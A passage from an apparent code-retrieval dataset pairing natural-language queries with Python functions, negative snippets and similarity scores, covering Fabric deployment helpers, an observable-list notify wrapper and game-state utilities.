files. ' print print "Cleaning up temp files..." # remove deploy.tar.temp only if it exists. if os.path.isfile('./deploy.tar.temp'): os.remove('./deploy.tar.temp') print print 'Finished (with errors)' return 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main():\n parser = argparse.ArgumentParser(description='Create packaged set of modulefiles for deployment on OASIS.')\n parser.add_argument('--location', dest='location', default=None,\n help='Location directory to place files in')\n parser.add_argument('--tarfile', dest='tarfile', default=None,\n help='Name of tarfile to generate')\n args = parser.parse_args(sys.argv[1:])\n if args.location is None:\n args.location = tempfile.mkdtemp()\n elif os.path.exists(args.location):\n overwrite = raw_input(\"{0} exists, overwrite? \".format(args.location))\n if overwrite.lower().strip() != 'y':\n sys.stderr.write(\"Exiting...\")\n sys.exit(0)\n shutil.rmtree(args.location)\n os.mkdir(args.location)\n else:\n os.mkdir(args.location)\n location = checkout_repo(args.location) \n if location is None:\n sys.stderr.write(\"Can't checkout modulefiles to {0}!\\n\".format(args.location))\n package_files(location)\n if args.tarfile is None:\n args.tarfile = \"/tmp/moduleupdate.tar.gz\"\n if tar_files(location, args.tarfile) is None:\n sys.stderr.write(\"Error generating tarfile, exiting\\n\")\n sys.exit(1)\n shutil.rmtree(location)\n sys.stdout.write(\"Packaged files located at {0}\\n\".format(args.tarfile))", "def deploy():\n archive_path = do_pack()\n if archive_path is None:\n print(\"pass\")\n return False\n return do_deploy(archive_path)", "def deploy():\n myfile = do_pack()\n if myfile is None:\n return False\n return do_deploy(myfile)", "def main():\n with open('config.json') as config_file:\n configs = json.load(config_file)\n\n jar_list = utilities.upload_jars(configs)\n utilities.sign_jars(configs)\n\n artifact_folder = utilities.prepare_artifacts(configs, jar_list)\n\n repo_id = utilities.create_staging_repo(configs)\n utilities.deploy_to_staging_repo(configs, artifact_folder, repo_id)\n utilities.close_staging_repo(configs, repo_id)", "def deploy():\n filepath = do_pack()\n if (filepath is None):\n return False\n return do_deploy(filepath)", "def deploy():", "def deploy():\n build()\n copy()\n install()", "def deploy():\n new_archive = do_pack()\n\n if new_archive is None:\n return False\n\n res = do_deploy(new_archive)\n return res", "def deploy():\n comp = do_pack()\n\n if (not comp):\n return False\n return do_deploy(comp)", "def deploy():\n packing = do_pack()\n if packing is False:\n return False\n\n return do_deploy(packing)", "def deploy():\n archive_path = do_pack()\n if archive_path is False:\n return false\n\n deploy_return = do_deploy(archive_path)\n return deploy_return", "def create_deployment_package(self):\n try:\n self.ensure_build_dir()\n except BaseException as be:\n logging.error('Failed to ensure an empty build dir')\n raise be\n\n # Build dir exists (or existed as of the last check)\n #\n # Copy script to build dir.\n # - On fail, tear down build dir\n try:\n self.copy_script()\n except BaseException as be:\n logging.error('Failed to copy script, {script}, to build dir'.format(script=self.script_file))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n print('Deleting build dir failed.')\n raise be\n\n # Copy rkstr8 project to build dir.\n # - On fail, tear down build dir\n try:\n self.copy_rkstr8()\n except BaseException as be:\n logging.error('Failed to copy script, {script}, to build dir'.format(script=self.script_file))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n print('Deleting build dir failed.')\n raise be\n\n try:\n self.install_requirements()\n except BaseException as be:\n logging.error('Failed to copy script, {script}, to build dir'.format(script=self.script_file))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n print('Deleting build dir failed.')\n raise be\n\n try:\n self.zip_build_dir()\n except BaseException as be:\n logging.error(\n 'Failed to create zip file, {zip}, to from build dir, {dir}'.format(zip=self.deployment_zip,\n dir=self.build_dir))\n logging.error('Attempting to remove build dir...')\n try:\n self.tear_down_build_dir()\n except:\n logging.error('Deleting build dir failed.')\n raise be", "def deploy():\n return do_deploy(do_pack())", "def deploy():\n return do_deploy(do_pack())", "def deploy():\n return do_deploy(do_pack())", "def deploy():\n build()\n collect()\n commit()\n push()", "def deploy():\n require('hosts', provided_by=[prod])\n require('whole_path', provided_by=[prod])\n require('code_root')\n upload_tar_from_git(env.whole_path)\n install_requirements()\n symlink_current_release()\n migrate()\n restart_webservers()\n setup_permissions()\n collectstatic()", "def deploy(ctx):\n click.echo('deploying')\n ctx.deploy()\n click.echo('done')", "def package(target, source, env):\n\n # Print out.\n print('')\n print(\"#######################\")\n print(\"# Packaging the files #\")\n print(\"#######################\")\n\n # List of distribution files.\n type_list = [env['DIST_TYPE']]\n if type_list[0] == 'ALL':\n type_list = ['zip', 'tar']\n\n # Loop over the distribution files.\n for dist_type in type_list:\n # The file name.\n if dist_type == 'zip':\n file = env['DIST_FILE'] + '.zip'\n elif dist_type == 'tar':\n file = env['DIST_FILE'] + '.tar.bz2'\n elif dist_type == 'dmg':\n file = env['DIST_FILE'] + '.dmg'\n\n # Print out.\n print(\"\\n\\nCreating the package distribution \" + repr(file) + \".\\n\")\n\n # Create the special Mac OS X DMG file and then stop execution.\n if dist_type == 'dmg':\n # Create the Mac OS X universal application.\n print(\"\\n# Creating the Mac OS X universal application.\\n\\n\")\n cmd = '%s setup.py py2app' % sys.executable\n print(\"%s\\n\" % cmd)\n pipe = Popen(cmd, shell=True, stdin=PIPE, close_fds=False)\n waitpid(pipe.pid, 0)\n\n # Create the dmg image.\n print(\"\\n\\n# Creating the DMG image.\\n\\n\")\n cmd = 'hdiutil create -ov -fs HFS+ -volname \"relax\" -srcfolder dist/relax.app ../%s' % file\n print(\"%s\\n\" % cmd)\n pipe = Popen(cmd, shell=True, stdin=PIPE, close_fds=False)\n waitpid(pipe.pid, 0)\n\n # Stop executing.\n return\n\n # Open the Zip distribution file.\n if dist_type == 'zip':\n archive = ZipFile(path.pardir + path.sep + file, 'w', compression=8)\n\n # Open the Tar distribution file.\n elif dist_type == 'tar':\n if search('.bz2$', file):\n archive = TarFile.bz2open(path.pardir + path.sep + file, 'w')\n elif search('.gz$', file):\n archive = TarFile.gzopen(path.pardir + path.sep + file, 'w')\n else:\n archive = TarFile.open(path.pardir + path.sep + file, 'w')\n\n # Base directory.\n base = getcwd() + sep\n\n # Walk through the directories.\n for root, dirs, files in walk(getcwd()):\n # Skip the subversion directories.\n if search(\"\\.svn\", root):\n continue\n\n # Add the files in the current directory to the archive.\n for i in range(len(files)):\n # Skip any '.sconsign' files, hidden files, byte-compiled '*.pyc' files, or binary objects '.o', '.os', 'obj', 'lib', and 'exp'.\n if search(\"\\.sconsign\", files[i]) or search(\"^\\.\", files[i]) or search(\"\\.pyc$\", files[i]) or search(\"\\.o$\", files[i]) or search(\"\\.os$\", files[i]) or search(\"\\.obj$\", files[i]) or search(\"\\.lib$\", files[i]) or search(\"\\.exp$\", files[i]):\n continue\n\n # Create the file name (without the base directory).\n name = path.join(root, files[i])\n name = name[len(base):]\n print('relax-' + version + path.sep + name)\n\n # The archive file name.\n arcname = 'relax-' + version + path.sep + name\n\n # Zip archives.\n if dist_type == 'zip':\n archive.write(filename=name, arcname=arcname)\n\n # Tar archives.\n if dist_type == 'tar':\n archive.add(name=name, arcname=arcname)\n\n # Close the archive.\n archive.close()\n\n # Final printout.\n print(\"\\n\\n\\n\")", "def deploy():\n\n archive_path = do_pack()\n\n if archive_path is None:\n return False\n\n return do_deploy(archive_path)", "def deploy():\n archive_path = do_pack()\n\n if not archive_path:\n return False\n\n return do_deploy(archive_path)", "def deploy():\n try:\n archive_path = do_pack()\n did_deploy = do_deploy(archive_path)\n return did_deploy\n except:\n return False", "def deploy():\n\n project_dir = '/home/gastosabertos/gastos_abertos_website'\n with cd(project_dir):\n local('tar -cvzf build.tar.gz build')\n run('cp -r build build-old')\n put('build.tar.gz', '.')\n run('tar -xvf build.tar.gz')", "def full_deploy():\n refresh_cts()\n push_mockups()\n deploy()", "def do_pack():\n time_test = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n file_name = \"versions/web_static_\" + time_test + \".tgz\"\n command1 = \"mkdir -p versions\"\n command2 = \"tar -czvf \" + file_name + \" web_static\"\n local(command1)\n com = local(command2)\n if com.return_code == 0:\n return file_name\n else:\n return None", "def do_pack():\n now = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n local('mkdir -p versions')\n result = local('tar -czvf versions/web_static_{}.tgz web_static'\n .format(now))\n if result.failed:\n return None\n else:\n return result", "def task_deploy():\n client = boto3.client(\"lambda\")\n\n def upload_build():\n if function_exists(client):\n update_lambda_function(client)\n else:\n create_lambda_function(client)\n\n return {\"actions\": [upload_build], \"file_dep\": [f\"{DIST_DIR}/build.zip\"]}", "def main():\n args = cli()\n\n title = ' [%s] ***' % PROG\n print('*' * (80 - len(title)) + title)\n print(' Remote Hosts : %s' % (' -> '.join(args.hosts)))\n print(' Local Path : %s' % args.local)\n print(' Remote Path : %s' % args.remote)\n print(' Upload Files : %s' % args.upload_files)\n print('Download Files : %s' % args.download_files)\n print(' Action : %s' % args.action)\n print(' Ignored Dirs : %s' % args.ignore_dirs)\n print(' Ignored Files : %s' % args.ignore_files)\n print('*' * 80)\n\n if args.test:\n return\n\n if args.ignore_dirs:\n not_match_dir = '(.*/)?(%s)/.*' % ('|'.join([re.escape(i) for i in args.ignore_dirs]))\n else:\n not_match_dir = None\n\n if args.ignore_files:\n not_match_file = '.*/(%s)' % ('|'.join([re.escape(i) for i in args.ignore_files]))\n else:\n not_match_file = None\n\n not_match = '(%s)' % ('|'.join(['(%s)' % i for i in [not_match_dir, not_match_file, args.ignore] if i]))\n print('Ignore: %r' % not_match)\n\n chain = build_chain(args.hosts)\n try:\n ignore_patterns = []\n ssh_deploy.main(chain, args.local, args.remote, action=args.action,\n files_upload=args.upload_files, ignore_patterns=ignore_patterns,\n files_download=args.download_files,\n not_match=not_match)\n except Exception as error:\n LOG.exception('Uncaught Exception: %s', error)\n finally:\n chain.close()", "def main():\n\n if not os.environ.get('TRAVIS_PULL_REQUEST', 'false') == 'false':\n return\n\n git_config_setup()\n populate_source()\n build_and_deploy()", "def deploy():\n require(\"hosts\", provided_by=[production, staging])\n env.release = time.strftime(\"%Y-%m-%d_%H:%M:%S\")\n upload_tar_from_git()\n install_requirements()\n setup_webserver()\n symlink_current_release()\n restart_webserver()" ]
[ "0.7674628", "0.7009183", "0.69814724", "0.6909496", "0.67717195", "0.67605096", "0.6690661", "0.6664085", "0.6589862", "0.65550286", "0.65225005", "0.6473202", "0.64672995", "0.64672995", "0.64672995", "0.64645517", "0.6382354", "0.63811666", "0.63648045", "0.6364746", "0.6338002", "0.6303981", "0.6286637", "0.6281648", "0.62753373", "0.6272629", "0.6243884", "0.6230276", "0.6191687", "0.6173495" ]
0.77710694
0
Methods decorated with notify_wrap make a copy of the list before the operation, then notify observers of the change after. The list itself, the old list, and the new list are sent as arguments.
def notify_wrap(self, func, *args, **kw): val = func(self, *args,**kw) if not self._observable_frozen: self.notify('list', None, self) return val
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_list_inplace_update(self):\r\n vm = List.value_manager(None, None, [1,2,3])\r\n assert not vm.changed\r\n vm.value.append(4)\r\n assert vm.changed", "def change(some_list):\n some_list[0] = 'Changed' # will change the original list", "def update_cloud_watch_obj_list(old_list, new_list):\n\n # Add new.\n for new_item in new_list:\n if new_item not in old_list:\n new_item.added = True\n old_list.append(new_item)\n\n # Remove deleted.\n for old_item in old_list:\n if old_item not in new_list:\n old_list.remove(old_item)\n\n return old_list", "def test_list_update(self):\r\n vm = List.value_manager(None, None, [1,2,3])\r\n assert not vm.changed\r\n vm.value = [4,5,6]\r\n assert vm.changed", "def change_history(self, new_reflist, modification_msg):\n self.visual.log(\"New reference list wrt: [{}], yielded {} items.\".format(modification_msg, len(new_reflist)))\n self.push_reference_list(new_reflist, modification_msg)\n # unselect stuff -- it's meaningless now\n self.unselect()", "def handle_list_items(self, object, name, old, new):\n self.handle_list(object, name, new.removed, new.added)", "def handle_list(self, object, name, old, new):\n raise NotImplementedError", "def changeme(mylist2): # create function changeme using parameters mylist2\n mylist2 = [1, 2, 3, 4] # This would assign new reference in mylist\n print(\"Values inside the function: \", mylist2) # print the new value of mylist2\n return", "def _update_proxy(self, change):\n # The superclass implementation is sufficient.\n super(ListView, self)._update_proxy(change)", "def handle_list(self, object, name, old, new):\n if old is not None and old is not Uninitialized:\n unregister = self.next.unregister\n for obj in old:\n unregister(obj)\n\n register = self.next.register\n for obj in new:\n register(obj)", "def mutate_list(alist):\n alist.append(42)", "def handle_list_items(self, object, name, old, new):\n raise NotImplementedError", "def copy_list(self,list_):\r\n return list_[:]", "def mutate_list_2(lst):\r\n elem = lst[0]\r\n lst.remove(elem)\r\n lst.append(elem)\r\n return lst", "def updateList(self):\n for state in list_:\n state.update(True)", "def handle_list_items_special(self, object, name, old, new):\n wh = self.wrapped_handler_ref()\n if wh is not None:\n wh(object, name, new.removed, new.added)", "def ref_ex1():\n\n print(\"Look Alikes\")\n print(\"===========\")\n\n lst1 = [7, 3, 2]\n lst2 = [7, 3, 2]\n print(lst1, lst2)\n\n lst1[1] = -8\n print(lst1, lst2)\n\n print(\"\")\n print(\"Aliases\")\n print(\"=======\")\n\n lst3 = [1, 5, 9]\n lst4 = lst3\n print(lst3, lst4)\n\n lst3[1] = 17\n print(lst3, lst4)\n\n print(\"\")\n print(\"Copies\")\n print(\"======\")\n\n lst5 = [8, 9, 4]\n # This makes a shallow copy\n lst6 = list(lst5)\n print(lst5, lst6)\n\n lst5[1] = -2\n print(lst5, lst6)\n\n print(\"\")\n print(\"Function Arguments\")\n print(\"==================\")\n\n\n lst7 = [1, 2, 3]\n print(lst7)\n mutate_list(lst7)\n print(lst7)\n return 0", "def notifyObservers(self):", "def test_partial_updates(self):\r\n final = range(10)\r\n initial = final[3:7]\r\n m1 = TestListModel.create(int_list=initial)\r\n\r\n m1.int_list = final\r\n m1.save()\r\n\r\n m2 = TestListModel.get(partition=m1.partition)\r\n assert list(m2.int_list) == final", "def changeme(mylist): # create function mylist with arguments of mylist\n mylist.append([1, 2, 3, 4]) # append(add on to the end) [1, 2, 3, 4] to mylist\n print(\"Values inside the function: \", mylist) # print the altered values of mylist\n return # exit out of the function and go back to the outside code", "def test_list(self):\n event_cache = []\n\n class A(HasTraits):\n x = EventfulList([c for c in 'abc'])\n a = A()\n a.x.on_events(lambda i, x: event_cache.append('insert'), \\\n lambda i, x: event_cache.append('set'), \\\n lambda i: event_cache.append('del'), \\\n lambda: event_cache.append('reverse'), \\\n lambda *p, **k: event_cache.append('sort'))\n\n a.x.remove('c')\n # ab\n a.x.insert(0, 'z')\n # zab\n del a.x[1]\n # zb\n a.x.reverse()\n # bz \n a.x[1] = 'o'\n # bo\n a.x.append('a')\n # boa\n a.x.sort()\n # abo\n\n # Were the correct events captured?\n self.assertEqual(event_cache, ['del', 'insert', 'del', 'reverse', 'set', 'set', 'sort'])\n\n # Is the output correct?\n self.assertEqual(a.x, [c for c in 'abo'])", "def testNotifyWithValidListDate(self):\r\n self.assertEqual(self.view.notify(self.mockViews, []), None)", "def svn_changelist_invoke_receiver(svn_changelist_receiver_t__obj, void_baton, char_path, char_changelist, apr_pool_t_pool): # real signature unknown; restored from __doc__\n pass", "def updateList(self):\n self._recreateJobs()", "def notify(self, arg=None):\n for observer in self._observers:\n observer.notify(arg)", "def _list_changed_handler ( self, name, old, new ):\n arg_lists = self._get_instance_handlers( name )\n\n for item in old:\n for args in arg_lists:\n item.on_trait_change( remove = True, *args )\n\n for item in new:\n for args in arg_lists:\n item.on_trait_change( *args )", "def reconcile_list(host: Component, key: str, old: List, new: List) -> List:\n zipped = zip_longest(old, new, fillvalue=None)\n reconciled_list = [\n reconcile(host, key, ndx, old_item, new_item)\n for ndx, (old_item, new_item) in enumerate(zipped)\n ]\n return [r for r in reconciled_list if r is not None]", "def update_list_view(self):\n self.model.dataChanged.emit(self.model.index(0, 1),\n self.model.index(len(self.model.data_list), 1))\n #self.pBar.setValue(localization.localizationProgress() * 100)", "def push_addr_reservation_list(self, lst_new):\n self.__not_implemented()", "def test_update_list_changes_data(qtbot):\n # Given\n model = SourcesModel()\n assert model.rowCount() == 0\n\n sources = []\n source = Source(\"I001\", \"Test\", \"Person\", \"Pub\", \"Abbr\")\n sources.append(source)\n\n # When\n with qtbot.waitSignals([model.modelAboutToBeReset, model.modelReset]):\n model.update_list(sources)\n\n # Then\n assert model.rowCount() == 1" ]
[ "0.6467967", "0.632745", "0.6217688", "0.6164946", "0.6039418", "0.58916533", "0.5679391", "0.56683993", "0.56465167", "0.5604742", "0.5588091", "0.55784154", "0.55419934", "0.5493708", "0.54824", "0.54641175", "0.5373986", "0.5372224", "0.5364606", "0.5323254", "0.5318951", "0.5297743", "0.5267595", "0.52447224", "0.5230637", "0.5210026", "0.52084947", "0.52052456", "0.51957417", "0.51955324" ]
0.71751255
0
Return corresponding command for a word
def _word_to_command(word): for command in KEYWORDS: for w in KEYWORDS[command]: if w == word: return command
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_action(command):\n return command.split(\" \")[0]", "def get_command(self, kword: str):\n # Step Zero is to make sure that the name does not belong to a REAL command.\n zero, mod = super().get_command(kword)\n if zero:\n return zero, mod\n\n # Otherwise, first, ensure that the keyword does in fact exist in the custom list.\n command = self.config.commands.get(kword, None)\n if not command:\n return None, None\n response = command[\"com\"]\n\n # Build the function to return the response. Note that \"self\" exists already.\n async def cmd_custom(args, src, **_):\n if args:\n member = self.get_member(src, args[0].strip())\n tag = member.mention if member else None\n else:\n tag = None\n\n nsfw = command.get(\"nsfw\", False)\n if nsfw and src.channel.id not in self.config.get(\"nsfwChannels\"):\n return None\n\n # Replace tags where needed.\n try:\n output = response.format(\n self=src.author.name,\n myID=src.author.id,\n tag=tag or src.author.mention,\n )\n except KeyError:\n return None\n else:\n return output\n\n # Specify the docstring and name so that !help will work on this.\n short = response.replace(\"{\", \"{{\").replace(\"}\", \"}}\")\n if len(short) > 80:\n short = short[:77] + \"...\"\n cmd_custom.__doc__ = (\n \"__Custom command__: Return the following text: ```{}```\\n\\n\".format(short)\n + command.get(\n \"desc\",\n \"This is a custom command, so available help text is limited, but at the same time, the command is very simple. All it does is return a string, although the string may include formatting tags for invoker name, invoker ID, and a targeted mention.\",\n )\n + \"\\n\\nSyntax: `{p}\"\n + kword.lower()\n + (\" <user_ID>\" if \"{tag}\" in response else \"\")\n + \"`\"\n )\n cmd_custom.__name__ = \"cmd_\" + kword.lower()\n\n return cmd_custom, None", "def get_word():\n return ' '.join(sys.argv[1:])", "def get_key(command):\n return command.split(\" \")[1]", "def choose_word():\n pass", "def get_command(robot_name):\n\n prompt = ''+robot_name+': What must I do next? '\n command = input(prompt)\n while len(command) == 0 or not valid_command(command):\n output(robot_name, \"Sorry, I did not understand '\"+command+\"'.\")\n command = input(prompt)\n\n return command.lower()", "def _func_named(self, arg):\n result = None\n target = 'do_' + arg\n if target in dir(self):\n result = target\n else:\n if self.abbrev: # accept shortened versions of commands\n funcs = [func for func in self.keywords if func.startswith(arg) and func not in self.multilineCommands]\n if len(funcs) == 1:\n result = 'do_' + funcs[0]\n return result", "def bot_ce(mess, nick, botCmd):\n path = \"/usr/bin/\"\n \"\"\"Look up word in dict via sdcv\"\"\"\n if (len(botCmd) == 1):\n message = u\"/me says:“Please type in format: ‘!d word’”\"\n else:\n word = botCmd[1]\n cmd = path + \"sdcv --utf8-output --utf8-input -n '\" + word +\"'\"\n result = os.popen(cmd.encode(\"UTF-8\"), \"r\").read()\n if result:\n if result.count('-->') > 1:\n # firstArrowPosition = result.find('-->')\n # secondArrowPosition = result.find('-->', firstArrowPosition + 3)\n # result = result[:secondArrowPosition]\n message = '/me says:\\n' + result\n else:\n message = self.optFail(u\"Word not found.\")\n return message", "def getCommand(self, name):\n return self.commands[name]()", "def get_cmd(self, command):\n return self.commands[command][\"cmd\"]", "def _get_command(self, message, db_session):\n first_word = self.ts.get_human_readable_message(message).split(' ')[0]\n if len(first_word) > 1 and first_word[0] == '!':\n potential_command = first_word[1:].lower()\n else:\n return None\n if potential_command in self.sorted_methods['for_all']:\n return [potential_command, 'for_all']\n if potential_command in self.sorted_methods['for_mods']:\n return [potential_command, 'for_mods']\n db_result = db_session.query(db.Command).filter(db.Command.call == potential_command).all()\n if db_result:\n return [potential_command, db_result[0]]\n return None", "def _getCommand(self, cmd):\n try:\n cmd_str = cmd.decode('utf-8')\n return getattr(self, 'do_' + cmd_str, None)\n except:\n return None", "def get_command(command):\n for _cmd in commands:\n if _cmd.command == command:\n return _cmd\n raise UserWarning(\"telegram command not found.\")", "def _build_solo_command(self, cmd):\n return COMMAND_CHAR[cmd]", "def get_command(self, ctx, name):\n commands = self._iter_commands()\n return commands[name].load()", "def get_command(self, command_name):\n valid_commands = []\n for existing_command in self._blotish_commands.keys():\n if existing_command.startswith(command_name):\n valid_commands.append(existing_command)\n if len(valid_commands) != 1:\n raise blotish.BlotishError, \"No such command '\" + command_name + \"'\"\n return self._blotish_commands[valid_commands[0]]", "def get_command_with_name(self, command_name):\n return self.commands[command_name]", "def select_cmd():\r\n help_dict = {'1': \"Create LZ, GMA/TPL, \"\r\n \"replace stage files in <ISO path>//stage directory, rebuild ISO\",\r\n '2': \"Create LZ, GMA/TPL, \"\r\n \"replace stage files in <ISO path>//stage directory\",\r\n '3': \"Create LZ, GMA/TPL\",\r\n '4': \"Create .lz.raw\",\r\n '5': \"Compress .lz.raw\",\r\n '6': \"Create LZ\",\r\n '7': \"Create GMA/TPL\",\r\n '8': \"Replace stage files in <ISO path>//stage directory, run GCR\",\r\n '9': \"Rebuild ISO\"\r\n }\r\n\r\n for h_key, h_value in help_dict.items():\r\n print(\"{} ----> {}\".format(h_key, h_value))\r\n\r\n while True:\r\n cmd_input = input(\"\\nEnter command: \")\r\n if cmd_input == \"\":\r\n print(\"\\nInvalid command! Try again.\")\r\n\r\n elif cmd_input.lower() not in help_dict.keys():\r\n print(\"\\nInvalid command! Try again.\")\r\n\r\n else:\r\n return cmd_input.lower()", "def cmd(name: str) -> Callable:\n return g.new_cmd_decorator(name, ['c', 'spellCommands',])", "def help_for_command(command):\n help_text = pydoc.text.document(command)\n # remove backspaces\n return re.subn('.\\\\x08', '', help_text)[0]", "def define(word):\n\treturn lexicon.get(word.upper(), \"I couldn't find the definition of {}\\n\".format(word))", "def findCommand(line):\n\n p = re.compile(r\"^!(\\w+)(\\s(.*))?$\")\n m = p.search(line)\n\n if m and m.group(1):\n return m.group(1),m.group(3)\n else: \n return \"\",\"\"", "def extract_command(text):\n return text.split()[0].split('@')[0][1:] if is_command(text) else None", "def extract_command(text):\n return text.split()[0].split('@')[0][1:] if is_command(text) else None", "def analiza(command):\n action, where = None, None\n\n for option in all_actions:\n action_found = search(escape(option), command)\n if action_found:\n action = action_found.group(0)\n break\n\n if 'office1' in command and 'office2' in command:\n where = '1'\n else:\n for place in ['office1', 'office2']:\n where_found = search(place, command)\n if where_found:\n where = (where_found.group(0)).capitalize()\n return action, where", "def _get_command_lookup(self, command_dict):", "def get_command(self,command):\n\t\treturn self.command_handlers[command]", "def translate_command(self, command: str) -> str:\n return self.command_map.get(command, command)", "def get_command(self, ctx, cmd_name):\n cmd_name = self.MAP.get(cmd_name, cmd_name)\n return click.Group.get_command(self, ctx, cmd_name)", "def getWord(self,):\n\t\treturn self.word;" ]
[ "0.70963365", "0.68949115", "0.66989183", "0.6638945", "0.6634957", "0.64863515", "0.6485151", "0.6464957", "0.6424962", "0.6381107", "0.63472664", "0.6344467", "0.6342394", "0.6246106", "0.61938083", "0.6175004", "0.6174016", "0.616791", "0.6157394", "0.6150461", "0.6136199", "0.61267376", "0.6076507", "0.6076507", "0.6064111", "0.60626554", "0.60455173", "0.60372597", "0.6019787", "0.6019785" ]
0.842294
0
Returns time in seconds, assumes the game is played on 'faster'
def time(self) -> float: return self.state.game_loop / 22.4 # / (1/1.4) * (1/16)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n return float(time.perf_counter()*1000)", "def getTime():\n\n return float(time.perf_counter()*1000)", "def currentTimeSecs():\n return time.time()", "def time_elapsed(session, player):\n #TODO (also needs to be added to bot logic)", "def time(self):\n return pygame.time.get_ticks() - self.start_time", "def opponentscaredTime(self, gameState):\n opponents = self.getOpponents(gameState)\n for opponent in opponents:\n if gameState.getAgentState(opponent).scaredTimer > 1:\n return gameState.getAgentState(opponent).scaredTimer\n return None", "def get_time_ms():\n return int(round(time.time() * 1000))", "def GAME_TIME_ADVANCE(dt):", "def get_time_taken_sec(self) -> float:\n return self.time_stop - self.time_start", "def runtime(self):\n return (self.time - self.start).total_seconds()", "def time(self) -> int:\n return int(round(time.time() * 1000))", "def time_ms():\n return int(1000 * time.time())", "def time(n_games, time_per_game):\n\n total_time = n_games * time_per_game / 60\n return total_time", "def time():\n master = MasterTimer.getMasterTimer()\n\n if master.end_time:\n return master.end_time - master.start_time\n else:\n return time.time() - master.start_time", "def get_time(cls):\n now = rospy.Time.now()\n return now.secs + now.nsecs*(10**-9) # time in seconds", "def cpu_time(self):", "def elapsed_time():\r\n elapsed_time, duration = video_time()\r\n return elapsed_time", "def get_time(self) -> float:\n return self.player.time", "def get_time(self) -> float:\n self.rocket.update()\n return self.rocket.time", "def time(self) -> int:\n pass", "def time(self):\n return self._clock() - self._starttime", "def _current_time_seconds(self):\n return int(round(time.time()))", "def get_time(self):\n return self.get_timed() / 10.0", "def time_passed(self):\n return (datetime.now(timezone.utc) - self._time_run).total_seconds()", "def elapsed_time(self):\n # reset timer if game is not started\n if not self.started:\n self.timestamp = None\n return 0\n # sets the first timer\n if self.timestamp is None:\n self.timestamp = time.time()\n return 0\n # if there is a previous timer check elapsed time\n else:\n elapsed_time = time.time() - self.timestamp\n # if elapsed_time is larger than the maximum time, reset timer\n if elapsed_time >= self.max_time:\n self.timestamp = self.max_time\n return elapsed_time" ]
[ "0.7389196", "0.7389196", "0.7389196", "0.7389196", "0.7389196", "0.7389196", "0.73676103", "0.71701133", "0.7106586", "0.7045024", "0.70407975", "0.6973079", "0.696249", "0.6875897", "0.68629414", "0.6855212", "0.68415254", "0.6819904", "0.68141836", "0.67910516", "0.6747411", "0.67355376", "0.67325985", "0.6726998", "0.66871905", "0.6684003", "0.6599663", "0.65990275", "0.65978837", "0.6586945" ]
0.7943959
0
Possible start locations for enemies.
def enemy_start_locations(self) -> List[Point2]: return self._game_info.start_locations
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_start_coords(self, x:int, y:int) -> None:\r\n self.start_x = x\r\n self.start_y = y", "def start_location(self) -> Point2:\n return self._game_info.player_start_location", "def start(self) -> global___Pos:", "def set_locations():\n STATUS['locations']['monster'][0] = generate_random_coord(STATUS['grid_size'])\n STATUS['locations']['monster'][1] = generate_random_coord(STATUS['grid_size'])\n STATUS['locations']['weapon'][0] = generate_random_coord(STATUS['grid_size'])\n STATUS['locations']['weapon'][1] = generate_random_coord(STATUS['grid_size'])", "def init_locations():\n player, door, monster = sample(CELLS, k=3)\n\n return player, door, monster", "def place_entrance(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__current_room = x, y # places adventurer in dungeon at start of game\r\n self.__entrance_room = x, y\r\n self.__maze[x][y].set_entrance(True)", "def set_player_start_position(self):\n if self.field_size.x() == 0: return\n \n parts = len(self.player_list)\n y_list = []\n for p in range(1,parts+1):\n y_list.append(self.field_size.y()*p/(parts+1))\n\n for i,p in enumerate(self.player_list):\n p1 = Qt.QPoint(self.start_y,y_list[i])\n p2 = Qt.QPoint(self.start_y+self.start_length,y_list[i])\n p.set_start_position([p1,p2])\n p.status_remove = False\n p.override_direction(0)", "def _set_start(self, coordinates):\n self._start = coordinates", "def setUp(self):\n self.location = [(0, 0), (0, 1)]\n self.hit = (0, 0)", "def __init__(self, center_loc, tent_loc = Location(0,0)):\n # Andrey Tymofeiuk: This method is written by me\n self.center_loc = center_loc\n self.tent_loc = tent_loc\n MITCampus.tent_collect = []\n MITCampus.tent_collect.append(tent_loc)", "def set_starting_pos(self):\n if self.start and self.is_unoccupied(*self.start):\n self.current_pos = self.start[:]\n else:\n self.set_random_pos('starting')", "def choose_starting_points(self, agent):\n # Left Side\n if agent % 4 == 1:\n if self.left_side[\"x_max\"] != self.left_side[\"x_min\"]:\n x = (self.left_side[\"x_max\"] + self.left_side[\"x_min\"])/2\n else:\n x = self.left_side[\"x_max\"]\n if self.left_side[\"y_max\"] != self.left_side[\"y_min\"]:\n y = (self.left_side[\"y_max\"] + self.left_side[\"y_min\"])/2\n else:\n y = self.left_side[\"y_max\"]\n # Right Side\n elif agent % 4 == 2:\n if self.right_side[\"x_max\"] != self.right_side[\"x_min\"]:\n x = (self.right_side[\"x_max\"] + self.right_side[\"x_min\"])/2\n else:\n x = self.right_side[\"x_max\"]\n if self.right_side[\"y_max\"] != self.right_side[\"y_min\"]:\n y = (self.right_side[\"y_max\"] + self.right_side[\"y_min\"])/2\n else:\n y = self.right_side[\"y_max\"]\n # Top\n elif agent % 4 == 3:\n if self.top[\"x_max\"] != self.top[\"x_min\"]:\n x = (self.top[\"x_max\"] + self.top[\"x_min\"])/2\n else:\n x = self.top[\"x_max\"]\n if self.top[\"y_max\"] != self.top[\"y_min\"]:\n y = (self.top[\"y_max\"] + self.top[\"y_min\"])/2\n else:\n y = self.top[\"y_max\"]\n # Bottom\n elif agent % 4 == 0:\n if self.bottom[\"x_max\"] != 